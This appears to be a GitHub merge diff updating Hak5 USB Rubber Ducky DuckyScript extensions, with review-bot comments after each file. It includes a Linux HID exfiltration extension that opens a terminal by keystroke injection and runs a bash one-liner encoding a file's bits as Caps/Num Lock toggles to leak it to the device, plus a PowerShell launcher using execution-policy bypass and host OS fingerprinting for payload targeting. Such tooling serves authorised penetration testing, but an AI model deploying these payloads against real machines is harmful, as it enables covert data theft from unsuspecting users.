Merge pull request #259 from hak5/1.3.0_updates

1.3.0 updates
Dallas Winger 2023-03-14 18:29:47 -04:00 committed by GitHub
commit b807c2ca7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 534 additions and 356 deletions


@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS


@ -1,23 +1,26 @@
EXTENSION DETECT_READY
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
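Review bot: The trailing `CAPSLOCK` at the end of the hunk toggles the host unconditionally: on a host whose Caps Lock was already on when the payload started the WHILE body never runs and this press turns it off, and on a host that never reflects the LED the loop has already pressed it an even number of times (#ITERATION_LIMIT = 120, net no change) so this final press leaves Caps Lock on for the rest of the payload. Only undo the toggle when the loop itself turned Caps Lock on and then saw the reflection, e.g. `IF (($C > 0) && ($C < #ITERATION_LIMIT)) THEN` / `CAPSLOCK` / `END_IF`. Because the no-reflection case depends on the parity of the limit, a REM next to `DEFINE #ITERATION_LIMIT 120` stating that the value must stay even would stop a later tuning change from silently breaking this.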


@ -1,18 +1,24 @@
EXTENSION EXFIL_AUTO_EOF_DETECT
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM_BLOCK DOCUMENTATION
USAGE:
Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM TARGETS:
REM Any; intended for use on systems that dont reflect more than 2 lock keys
TARGETS:
Requires reflection of at least 2 lock keys.
Intended for use on systems that dont reflect more than 2 lock keys.
END_REM
REM CONFIGURATION
DEFINE #INACTIVTY_TARGET 10
FUNCTION WAIT_FOR_EOF()
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
VAR $PROCESSING = TRUE
VAR $INACTIVITY_COUNT = 0
DEFINE INACTIVTY_TARGET 10
WHILE ($PROCESSING)
DELAY 20
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
LED_R
ELSE
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN
IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
$PROCESSING = FALSE
END_IF
LED_OFF
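Review bot: The counter in the ELSE branch of the second hunk is spelled `$INACTIVTY_COUNT` while the first hunk declares it as `VAR $INACTIVITY_COUNT = 0`, so the branch increments a variable that was never declared and the declared one stays at 0 — depending on how strict the compiler is that is either a compile error or a WAIT_FOR_EOF() that never terminates. Rename consistently and fix the define at the same time: `DEFINE #INACTIVITY_TARGET 10`, `$INACTIVITY_COUNT = ($INACTIVITY_COUNT + 1)`, `IF ($INACTIVITY_COUNT >= #INACTIVITY_TARGET) THEN`. The lines between the two hunks are not shown, so I cannot confirm the counter is reset to 0 when a lock change is detected; if it is not, EOF fires after ten quiet 20 ms polls in total rather than after 200 ms of continuous silence, which a REM above the WHILE should make explicit either way. WAIT_FOR_EOF() begins in the first hunk and its END_FUNCTION lies outside the view.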


@ -1,13 +1,17 @@
EXTENSION HELLO_OS
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE:
REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
REM prints the OS determination
REM_BLOCK DOCUMENTATION
USAGE:
For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
prints the OS determination
END_REM
REM Additional Example: Defining custom $_OS enums
DEFINE SOME_OTHER_OS 6
DEFINE ANOTHER_OS 7
DEFINE #EXTRA_EXAMPLES FALSE
DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS()
IF ($_OS == WINDOWS) THEN
@ -22,12 +26,14 @@ EXTENSION HELLO_OS
STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android!
ELSE IF($_OS == SOME_OTHER_OS) THEN
REM Example Only
STRING HELLO Custom OS Type!
ELSE IF($_OS == ANOTHER_OS) THEN
REM Example Only
STRING HELLO Another Custom OS Type!
IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Example Only
STRING HELLO Custom OS Type!
ELSE IF($_OS == #ANOTHER_OS) THEN
REM Example Only
STRING HELLO Another Custom OS Type!
END_IF_DEFINED
ELSE
STRING Hello World!
END_IF
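Review bot: The example enum values `DEFINE #SOME_OTHER_OS 6` and `DEFINE #ANOTHER_OS 7` in the first hunk collide with `DEFINE #NOT_WINDOWS 7` that PASSIVE_WINDOWS_DETECT introduces in this same PR, so a payload that includes both extensions with `#EXTRA_EXAMPLES TRUE` would greet a non-Windows host as "Another Custom OS Type". Whether 6 and 7 also overlap the built-in WINDOWS…ANDROID values is not visible here; a REM next to the defines such as `REM custom $_OS values must not overlap the built-in enum or other extensions' defines (e.g. #NOT_WINDOWS 7)` would at least warn users. Wrapping two `ELSE IF` arms in IF_DEFINED_TRUE/END_IF_DEFINED inside a single IF chain relies on the preprocessor removing them before the chain is parsed; since this is the only place the pattern is used, a one-line REM saying so would help readers.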


@ -1,44 +1,94 @@
EXTENSION LINUX_HID_EXFIL
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT
REM Helpers for Linux Keystroke Reflection data exfiltration
REM This payload is a proof of concept for USB HID only Data Exfiltration
REM_BLOCK DOCUMENTATION
Helpers for Linux Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET:
REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool
TARGET:
Linux host that supports opening terminal via CTRL ALT t, and xdotool
REM USAGE:
REM Uncomment the function call below to run this extension inline
REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension
USAGE:
REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
Prepare data to exfil (in filename defined by TARGET_FILE below)
with a terminal window already open - call RUN_LINUX_EXFIL()
REM DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
DEPLOYMENT:
Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
END_REM
REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE t.txt
DEFINE TERMINAL_OPEN_DELAY 500
DEFINE READY_TO_TYPE_DELAY 250
DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE
REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_LINUX_EXFIL()
LED_OFF
DELAY READY_TO_TYPE_DELAY
CTRL ALT t
DELAY TERMINAL_OPEN_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
STRINGLN uname -a > TARGET_FILE
STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit
STRING_BASH
c="xdotool key --delay 4";
bs=$(xxd -b
#TARGET_FILE
|cut -d" " -f2-7);
for((i=0;i<${#bs};i++));do
b="${bs:$i:1}";
if [[ "$b" == "0" ]];then
c+=" Caps_Lock";
fi;
if [[ "$b" == "1" ]];then
c+=" Num_Lock";
fi;
done;
$c;
END_STRING
IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one
WAIT_FOR_EOF()
$_EXFIL_LEDS_ENABLED = FALSE
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
$_EXFIL_LEDS_ENABLED = FALSE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
REM RUN_LINUX_EXFIL()
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
DELAY 3000
REM Open Terminal
CTRL ALT t
DELAY 500
REM Perpare some data in TARGET_FILE
STRINGLN uname -a>#TARGET_FILE
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_LINUX_EXFIL()
END_IF_DEFINED
END_EXTENSION
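Review bot: `#TARGET_FILE` is spliced into the bash `xxd -b` command unquoted, whereas the Windows extension in this PR quotes it (`Get-Content "#TARGET_FILE"`); a filename containing spaces or shell metacharacters breaks the Linux command, so use `xxd -b "#TARGET_FILE"` for consistency and robustness. The TARGET documentation should also state that xdotool key injection needs an X11 session and is generally not expected to work under Wayland compositors, e.g. `Requires an X11 session (xdotool cannot inject keys under most Wayland compositors)`. Replacing `eval "$c"` with a bare `$c;` works for these simple arguments, but any future edit that adds quoting to the assembled command will be word-split rather than parsed; a short REM inside the STRING_BASH block noting that `$c` must stay free of quoting would prevent that regression.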


@ -1,202 +1,217 @@
EXTENSION OS_DETECTION
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM USB Rubber Ducky Host OS Detection
REM Generic OS detection at a high view is a moving target
REM results may vary greatly depending
REM on a combination of many variables:
REM - number of testing stages
REM - specific devices and versions tested against
REM - number of systems testing for (scope)
REM - detection techniques (passive/invisible/active/hybrid)
REM - overall speed
REM - overall accuracy
REM_BLOCK DOCUMENTATION
USB Rubber Ducky Host OS Detection
Generic OS detection at a high view is a moving target
results may vary greatly depending
on a combination of many variables:
- number of testing stages
- specific devices and versions tested against
- number of systems testing for (scope)
- detection techniques (passive/invisible/active/hybrid)
- overall speed
- overall accuracy
REM TARGET:
REM DEFAULT - Windows, Mac, Linux
REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
If all you require is windows vs <anything other os> detection, the
PASSIVE_WINDOWS_DETECT extension is recommended over this extension.
REM USAGE:
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM Place this extension and the DETECT_OS() before
REM you would like to first reference $_OS to execute payload code conditionally
TARGET:
DEFAULT - Windows, Mac, Linux
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
USAGE:
Uncomment the function call below to run this extension inline (here)
or call DETECT_OS() anywhere in your payload after the extension
Place this extension and the DETECT_OS() before
you would like to first reference $_OS to execute payload code conditionally
FEEDBACK:
As mentioned above, this a moving target (especially for mac systems)
Please report any issues identifying specific operating systems.
Your feedback will greatly help solidify the robustness of this extension
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION:
DEFINE VERBOSE FALSE
DEFINE ADVANCED_DETECTION FALSE
DEFINE STARTUP_DELAY 1500
DEFINE RESTART_WAIT 1000
DEFINE CONNECT_WAIT 1000
DEFINE OS_DETECT_MODE HID
DEFINE OS_DETECT_VID VID_05AC
DEFINE OS_DETECT_PID PID_021E
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE HOST_RESPONSE_TIMEOUT 1000
REM For Debugging:
DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE #ADVANCED_DETECTION FALSE
REM Timing fine tuning:
DEFINE #STARTUP_DELAY 1500
DEFINE #RESTART_WAIT 1000
DEFINE #CONNECT_WAIT 1000
DEFINE #OS_DETECT_MODE HID
DEFINE #OS_DETECT_VID VID_05AC
DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
FUNCTION DETECT_OS()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY STARTUP_DELAY
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
IF ADVANCED_DETECTION THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT
ELSE
ELSE_DEFINED
STRING OS DETECT
END_IF
END_IF_DEFINED
ENTER
STRING test caps
END_IF
END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R
CAPSLOCK
DELAY HOST_RESPONSE_TIMEOUT
DELAY #HOST_RESPONSE_TIMEOUT
END_IF
LED_OFF
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING received led response
END_IF
END_IF_DEFINED
LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
IF VERBOSE THEN
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING prediction: Windows
END_IF
END_IF_DEFINED
$_OS = WINDOWS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING prediction: Linux
END_IF
END_IF_DEFINED
$_OS = LINUX
END_IF
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no led response
ENTER
STRING prediciton: MacOS
END_IF
END_IF_DEFINED
$_OS = MACOS
END_IF
IF ADVANCED_DETECTION THEN
IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING soft reconnect
END_IF
END_IF_DEFINED
ATTACKMODE OFF
DELAY RESTART_WAIT
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY CONNECT_WAIT
IF VERBOSE THEN
DELAY #RESTART_WAIT
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #CONNECT_WAIT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING reconnected
END_IF
END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING caps led on
ENTER
STRING test numlock
END_IF
END_IF_DEFINED
NUMLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no numlock led
ENTER
STRING prediciton: ChromeOS
END_IF
END_IF_DEFINED
$_OS = CHROMEOS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING numlock led on
ENTER
STRING testing scrolllock
END_IF
END_IF_DEFINED
SCROLLLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF
END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING scrolllock led on
ENTER
STRING prediciton: Android
END_IF
END_IF_DEFINED
$_OS = ANDROID
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no scrolllock reply
ENTER
STRING prediction: Linux
END_IF
END_IF_DEFINED
$_OS = LINUX
END_IF
END_IF
END_IF
ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING caps led on
ENTER
STRING prediction: iOS
END_IF
END_IF_DEFINED
$_OS = IOS
ELSE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING no caps reply
ENTER
STRING prediction: MacOS
END_IF
END_IF_DEFINED
$_OS = MACOS
END_IF
ELSE IF ($_OS == WINDOWS) THEN
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Confident Windows Prediction
END_IF
END_IF_DEFINED
$_OS = WINDOWS
END_IF
END_IF
END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING OS_DETECT complete
ENTER
END_IF
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM DETECT_OS()
END_EXTENSION
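Review bot: The injected debug strings misspell "prediction" as `prediciton` in the MacOS, ChromeOS and Android arms while the other arms spell it correctly; since #DEBUGGING_OUTPUT types these into the target's editor for later comparison, the inconsistency is worth fixing as `STRING prediction: MacOS`, `STRING prediction: ChromeOS`, `STRING prediction: Android`. The `$_OS = MACOS` and `$_OS = WINDOWS` assignments inside the ADVANCED_DETECTION `ELSE IF ($_OS == MACOS)` and `ELSE IF ($_OS == WINDOWS)` arms are no-ops because those arms are only reached when $_OS already holds that value; dropping them or adding a REM that they are intentional would make the decision tree easier to read. It would also help to document in the REM_BLOCK that the ADVANCED Linux path presses NUMLOCK and SCROLLLOCK on the host and then depends on RESTORE_HOST_KEYBOARD_LOCK_STATE, which presumably can only undo toggles the host reflected — so a host classified as ChromeOS because it did not reflect Num Lock may be left with Num Lock changed; I cannot confirm the firmware behaviour from here.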


@ -1,21 +1,24 @@
EXTENSION PASSIVE_DETECT_READY
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Passive Detect Ready - no injection dynamic boot delay
REM for hosts that reflect current OS lock key state on connect
REM_BLOCK DOCUMENTATION
Passive Detect Ready - no injection dynamic boot delay
for hosts that reflect current OS lock key state on connect
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
END_REM
REM CONFIGURATION:
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
VAR $MAX_TRIES = MAX_WAIT
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
END_EXTENSION
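Review bot: The documentation block does not state the effective ceiling: with `#MAX_WAIT 150` and `#CHECK_INTERVAL 20` the extension gives up after 150 × 20 = 3000 ms (the same cap DETECT_READY documents), and a payload cannot distinguish a timeout from a real reflection unless it knows to inspect `$MAX_TRIES`. Suggest adding to the REM_BLOCK: `Maximum wait is #MAX_WAIT * #CHECK_INTERVAL ms (3000 ms by default); after this extension, $MAX_TRIES == 0 means no lock-state reflection arrived and the payload should not assume the host is ready.` A REM at the CONFIGURATION section noting that the two values must be tuned together to keep the ceiling meaningful would also help.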


@ -1,37 +1,42 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE NOT_WINDOWS 7
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
VAR $MAX_TRIES = MAX_WAIT
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF
REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
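Review bot: The ELSE branch still assigns `$_OS = NOT_WINDOWS` after this commit renamed the define to `#NOT_WINDOWS`, so the new file references a symbol that no longer exists — the other uses (`$_OS = #NOT_WINDOWS` before the loop, `#WINDOWS_HOST_REQUEST_COUNT` in the IF) were converted but this unchanged context line was missed. Either change it to `$_OS = #NOT_WINDOWS`, or, since $_OS is now pre-initialised to #NOT_WINDOWS before the WHILE loop, drop the ELSE arm entirely and add a REM above the IF noting that the default was set earlier. The REM_BLOCK could also state the timeout ceiling (150 × 20 = 3000 ms) and that a non-Windows result after the loop may simply mean no LED reflection arrived in time.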


@ -1,38 +1,62 @@
EXTENSION PROTECTED_STORAGE_MODE
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Example hidden storage mode
REM Forces user to padlock style unlock storage mode by setting
REM the HOSTs lock keys and pressing the duck button to submit a
REM combination three times.
REM The wrong combination will immediately fail silently.
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM_BLOCK
Example hidden storage mode
Forces user to padlock style unlock storage mode by setting
the HOSTs lock keys and pressing the duck button to submit a
combination three times.
The wrong combination will immediately fail silently.
The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM TARGET:
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
TARGET:
Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
REM USAGE:
REM BUTTON_DEF
REM STORAGE_PASSWORD_CHECK()
REM END_BUTTON
USAGE:
BUTTON_DEF
STORAGE_PASSWORD_CHECK()
END_BUTTON
CONFIGURATION:
Available combinations provided as DEFINEs below,
change within the STORAGE_PASSWORD_CHECK as desired
Method of input submission can be changed using SUBMIT_FOR_CHECK
But will obviously convolute combination checks.
END_REM
REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)
DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS
FUNCTION STORAGE_PASSWORD_CHECK()
VAR $ACCEPED = FALSE
LED_R
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM first combination ALL LOCKS OFF
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ALL_LOCKS_OFF THEN
STRING .
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM second combination ONLY CAPS ON
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ONLY_CAPS_ON THEN
STRING .
WAIT_FOR_BUTTON_PRESS
#SUBMIT_FOR_CHECK
REM third combination ONLY NUM ON
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN
IF #ONLY_NUM_ON THEN
$ACCEPTED = TRUE
END_IF
END_IF
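Review bot: Each correct stage types `STRING .` into the host before the next `#SUBMIT_FOR_CHECK`, which undermines the documentation's "wrong combination will immediately fail silently": the dot is a per-stage oracle, so anyone with the device can confirm each of the three lock-key combinations independently (at most 3 × 8 = 24 attempts instead of 8³ = 512), and it also leaves visible keystrokes on the host. Remove the two `STRING .` lines, or defer any feedback until the final decision on $ACCEPTED. Two further defects on the new side: `#ALL_LOCKS_ON` is defined with `( $_SCROLLLOCK_ON == FALSE )`, making it identical to `#ONLY_SCROLL_OFF` (it should read `( $_SCROLLLOCK_ON == TRUE )`), and the function declares `VAR $ACCEPED = FALSE` but later sets `$ACCEPTED = TRUE`, so the declared flag is never set. STORAGE_PASSWORD_CHECK() continues past the end of the hunk, so I cannot see how the flag is consumed.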


@ -1,41 +1,52 @@
EXTENSION TRANSLATE
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM This extension acts as a library or collection of helper functions
REM to work with converting variables in your payloads.
REM WHY:
REM Of the many ways to get information about the state of your payload
REM is by injecting static strings effectively as debugging prints
REM However, given the non-static nature of payloads using variables in
REM DuckyScript 3.0 - the ability to decode variables during payload
REM execution and print (inject) representations of their current state
REM can often be a critically helpful development and debugging tool.
REM_BLOCK DOCUMENTATION
This extension acts as a library or collection of helper functions
